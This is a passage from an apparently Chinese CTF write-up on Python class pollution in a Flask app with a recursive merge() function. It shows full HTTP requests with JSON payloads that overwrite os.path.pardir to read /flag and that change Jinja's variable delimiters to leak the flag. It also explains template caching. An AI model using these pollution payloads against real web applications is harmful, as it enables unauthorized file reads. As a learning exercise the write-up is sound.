函数,继续跟进
欧克啊终于是找到了,那么污染
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 POST / HTTP/1.1 Host: ip:5000 Cache-Control: max -age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0 .0 .0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9 ,image/avif,image/webp,image/apng,*/*;q=0.8 ,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 ,en;q=0.8 Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45 Connection: close Content-Type : application/json Content-Length: 179 { "__init__" :{ "__globals__" :{ "os" :{ "path" :{ "pardir" :"?" } } } } }
1 2 3 4 5 6 7 8 9 10 11 12 GET /../flag HTTP/1.1 Host: ip:5000 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45 Connection: close
jinja_SSTI 大家常见的是{{}}
,但是有些特殊情况有这个是,那么我们就可以污染一下,使得其他符号也能做到相同的效果
1 2 3 4 5 <html > <h1 > Look this -> [[flag]] <- try to make it become the real flag</h1 > <body > </body > </html >
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 from flask import Flask,request,render_templateimport jsonapp = Flask(__name__) def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v) class cls (): def __init__ (self ): pass instance = cls() @app.route('/' ,methods=['POST' , 'GET' ] ) def index (): if request.data: merge(json.loads(request.data), instance) return "go check /index before merge it" @app.route('/index' ,methods=['POST' , 'GET' ] ) def templates (): return render_template("index.html" , flag = open ("flag" , "rt" ).read()) app.run(host="0.0.0.0" ,port=5000 ,debug=True )
这边尝试了一会儿,都拿不到报错消息,那我们本是是不是jinja
的问题,那我们直接进flask
,这里的目的就是污染jinja
标识符为[[]]
,那样子我们就可以拿到flag了,找不到跟进哪里了,那看看官方文档https://jinja.palletsprojects.com/en/3.1.x/api/#jinja2.Environment
然后还是找不到,不过我们知道了一些重要消息,variable_start_string
,variable_end_string
,直接问AI知道是这里
好了,这里我们直接跟进,发现啥玩意,找不到任何东西
很显然么有任何用,但是看了看也才200多行,可以直接浏览一下,发现有很多类似于这种东西app.jinja_env.from_string
,那我们此时直接替换成我们的不就可以了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 POST / HTTP/1.1 Host: ip:5000 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45 Connection: close Content-Type: application/json Content-Length: 250 { "__init__":{ "__globals__":{ "app":{ "jinja_env":{ "variable_start_string":"[[", "variable_end_string":"]]" } } } } }
再访问index
就拿到flag
了,但是这里仍然有个小细节,就是如果直接跟着提示进入了/index
,那么再次进行污染是不会被解析的
Flask
默认会对一定数量内的模板文件编译渲染后进行缓存,下次访问时若有缓存则会优先渲染缓存,所以输入payload
污染之后虽然语法标识符被替换了,但渲染的内容还是按照污染前语生成的缓存,由于缓存编译时并没有存在flag
变量,所以自然没有被填充flag
。
所以我们要先污染,再进行访问
padash 这个模块里面的函数和merge基本相同,同样可以做到污染的事情,后面再研究
0x03 小结 太优雅了,而且在这个过程中学会了跟进代码去审计,知道原理逻辑,虽然确实中间调试的时候会花费很多时间但是很开心!不过这里所提及的东西还是太过浅显,包括劫持等操作,后面还会探讨
0x04 reference Infernity 师傅对于代码审计部分的一些基本操作的帮助(第一次跟进,感觉很舒服)
期间还问了一些师傅其他问题,最后自己慢慢调试解决问题,谢谢师傅们的帮助啦
网上的文章都有看,谢谢师傅们!